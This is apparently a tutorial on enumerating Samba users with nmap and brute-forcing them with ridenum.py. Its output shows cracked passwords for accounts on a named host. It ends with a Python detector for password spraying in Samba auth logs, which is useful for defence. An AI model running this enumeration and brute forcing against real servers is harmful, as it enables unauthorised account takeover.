Finding Samba users with NMAP
We can use nmap to enumerate Samba user names on the remote host with the NSE script 'smb-enum-users':
root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT
Nmap scan report for srv01.acme.com (48.21.33.124)
Host is up (0.0027s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns

Host script results:
| smb-enum-users:
|   ASUS\clare (RID: 1001)
|     Full name:   clare chapman
|     Description:
|     Flags:       Normal user account
|   ASUS\hayden (RID: 1002)
|     Full name:   hayden sutton
|     Description:
|     Flags:       Normal user account
|   ASUS\jared (RID: 1003)
|     Full name:   jared beck
|     Description:
|     Flags:       Normal user account
|   ASUS\sam (RID: 1000)
|     Full name:   sam
|     Description:
|     Flags:       Normal user account
|   ASUS\sasha (RID: 1004)
|     Full name:   sasha kim
|     Description:
|     Flags:       Normal user account
|   ASUS\vance (RID: 1005)
|     Full name:   vance perkins
|     Description:
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
root@asus:~/unix%
Once we have the list of users on the Samba server, we can move on to enumerating and brute-forcing the accounts. Saved one name per line, the user list looks like this:

ASUS\clare
ASUS\sam
ASUS\sasha
ASUS\vance
ASUS\jared
ASUS\hayden
Using ridenum.py to brute force Samba user accounts
Rid Enum (ridenum.py) performs a RID cycling attack: over a null session it looks up the domain SID, cycles through RIDs to enumerate user accounts, and can then try a password list against the accounts it finds. Here it is run against the host with a RID range of 500 to 50000, a password list and the user list from above:

root@asus:~/src/ridenum% ./ridenum.py 48.21.33.124 500 50000 /home/sam/rock.txt /home/sam/samba.txt
[*] Successfully guessed username: ASUS\sasha with password of: master
[*] Successfully guessed username: ASUS\vance with password of: sonics
[*] Successfully guessed username: ASUS\jared with password of: attlabs
[*] Successfully guessed username: ASUS\hayden with password of: manager
[*] We got some accounts, exported results to 48.21.33.124_success_results_txt
[*] All accounts extracted via RID cycling have been exported to 48.21.33.124_users.txt
root@asus:~/src/ridenum%
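A run like the one above leaves a distinctive trace on the server side: a single source failing authentication against many different accounts in quick succession, then succeeding for some of them. As an added example that is not part of the original post, the Python below parses constructed log lines modelled on Samba's auth_audit text output and flags that pattern; the source addresses, timestamps and the exact line format are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in the style of Samba's auth_audit text log (an
# approximation for illustration, not captured output); 10.0.0.7, 10.0.0.20
# and the timestamps are made up, the usernames are the ones enumerated above.
SAMPLE_LOG = """\
Auth: [SMB2,(null)] user [ASUS]\\[clare] at [Tue, 24 Sep 2019 10:09:01 MDT] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.7:49152]
Auth: [SMB2,(null)] user [ASUS]\\[sasha] at [Tue, 24 Sep 2019 10:09:01 MDT] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.7:49153]
Auth: [SMB2,(null)] user [ASUS]\\[sasha] at [Tue, 24 Sep 2019 10:09:02 MDT] with [NTLMv2] status [NT_STATUS_OK] remote host [ipv4:10.0.0.7:49154]
Auth: [SMB2,(null)] user [ASUS]\\[vance] at [Tue, 24 Sep 2019 10:09:02 MDT] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.7:49155]
Auth: [SMB2,(null)] user [ASUS]\\[jared] at [Tue, 24 Sep 2019 10:09:03 MDT] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.7:49156]
Auth: [SMB2,(null)] user [ASUS]\\[hayden] at [Tue, 24 Sep 2019 10:09:03 MDT] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] remote host [ipv4:10.0.0.7:49157]
Auth: [SMB2,(null)] user [ASUS]\\[sam] at [Tue, 24 Sep 2019 10:30:00 MDT] with [NTLMv2] status [NT_STATUS_OK] remote host [ipv4:10.0.0.20:50001]
"""

AUTH_RE = re.compile(
    r"user \[(?P<domain>[^\]]*)\]\\\[(?P<user>[^\]]*)\].*?"
    r"status \[(?P<status>[^\]]+)\].*?remote host \[ipv4:(?P<ip>[\d.]+):\d+\]"
)

def parse_auth_line(line):
    """Return (source_ip, user, status) for an auth_audit-style line, else None."""
    m = AUTH_RE.search(line)
    return (m.group("ip"), m.group("user"), m.group("status")) if m else None

def detect_spraying(log_text, min_distinct_users=4):
    """Flag source IPs that fail against many distinct accounts (the trace a
    wordlist run over an enumerated user list leaves) and list any account
    that then succeeded from the same IP, i.e. a likely guessed password."""
    failed_users = defaultdict(set)
    later_success = defaultdict(set)
    for line in log_text.splitlines():
        parsed = parse_auth_line(line)
        if parsed is None:
            continue
        ip, user, status = parsed
        if status != "NT_STATUS_OK":
            failed_users[ip].add(user)
        elif failed_users[ip]:  # success only after earlier failures from this IP
            later_success[ip].add(user)
    return {ip: {"failed_users": sorted(users),
                 "succeeded_after_failures": sorted(later_success[ip])}
            for ip, users in failed_users.items() if len(users) >= min_distinct_users}

if __name__ == "__main__":
    for ip, info in detect_spraying(SAMPLE_LOG).items():
        print(f"{ip}: failed against {len(info['failed_users'])} accounts, "
              f"then succeeded as {info['succeeded_after_failures'] or 'none'}")
```

On the constructed sample, only 10.0.0.7 is flagged (five distinct accounts failed, then a success as sasha); the lone successful logon from 10.0.0.20 is not.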